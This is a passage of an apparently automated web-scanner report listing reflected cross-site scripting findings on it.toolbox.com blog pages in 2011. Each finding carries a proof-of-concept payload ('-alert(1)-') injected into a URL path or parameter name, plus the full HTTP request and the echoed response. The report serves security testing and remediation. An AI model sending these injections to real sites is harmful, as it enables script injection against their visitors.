<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Making The ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d43129%26c45be'-alert(1)-'37141b736fd%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 777b4'-alert(1)-'63cc4e8ea0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/777b4'-alert(1)-'63cc4e8ea0d HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26777b4'-alert(1)-'63cc4e8ea0d'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.64. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/micracle-free-37832
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce550'-alert(1)-'0fbcb25a578 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/micracle-free-37832?ce550'-alert(1)-'0fbcb25a578=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67082 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:13 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Micracle Fr ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d37832%26ce550'-alert(1)-'0fbcb25a578%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ea6'-alert(1)-'fc63506364d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/monthlyc2ea6'-alert(1)-'fc63506364d/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 50697 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fmonthly.aspx%3fslug%3dppmtoday%26c2ea6'-alert(1)-'fc63506364d%2f'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
3.66. http://it.toolbox.com/blogs/ppmtoday/monthly/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/monthly/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42927'-alert(1)-'e300d722da6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/monthly/?42927'-alert(1)-'e300d722da6=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 50589 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fmonthly.aspx%3fslug%3dppmtoday%2642927'-alert(1)-'e300d722da6%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55921'-alert(1)-'f69afd006fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/55921'-alert(1)-'f69afd006fa HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2655921'-alert(1)-'f69afd006fa'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.68. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/plowing-sideways-43376
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 923aa'-alert(1)-'5b66f60c6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/plowing-sideways-43376?923aa'-alert(1)-'5b66f60c6b0=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67973 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Plowing Sid ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d43376%26923aa'-alert(1)-'5b66f60c6b0%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98151'-alert(1)-'1ad1be6a8fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/98151'-alert(1)-'1ad1be6a8fa HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2698151'-alert(1)-'1ad1be6a8fa'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.70. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/roadmap-process-38207
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b720d'-alert(1)-'7c71c4dd298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/roadmap-process-38207?b720d'-alert(1)-'7c71c4dd298=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73697 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:14 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Roadmap Pro ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38207%26b720d'-alert(1)-'7c71c4dd298%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74a55'-alert(1)-'6ac004d8ab9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/74a55'-alert(1)-'6ac004d8ab9 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2674a55'-alert(1)-'6ac004d8ab9'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.72. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/saas-marches-on-38509
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f431'-alert(1)-'136d885acd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/saas-marches-on-38509?1f431'-alert(1)-'136d885acd9=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66969 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:10 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SaaS marche ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38509%261f431'-alert(1)-'136d885acd9%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f308c'-alert(1)-'02badb2b125 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/f308c'-alert(1)-'02badb2b125 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26f308c'-alert(1)-'02badb2b125'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.74. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/talent-curves-40195
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dcb'-alert(1)-'2669c2ff9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/talent-curves-40195?13dcb'-alert(1)-'2669c2ff9f=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 85846 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:41 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Talent Curv ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40195%2613dcb'-alert(1)-'2669c2ff9f%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56d52'-alert(1)-'064c4d5504d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/56d52'-alert(1)-'064c4d5504d HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2656d52'-alert(1)-'064c4d5504d'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.76. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/technical-debt-revisiited-38720
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7966f'-alert(1)-'717976eea32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/technical-debt-revisiited-38720?7966f'-alert(1)-'717976eea32=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 75648 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:11 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:11 GMT Connection: close
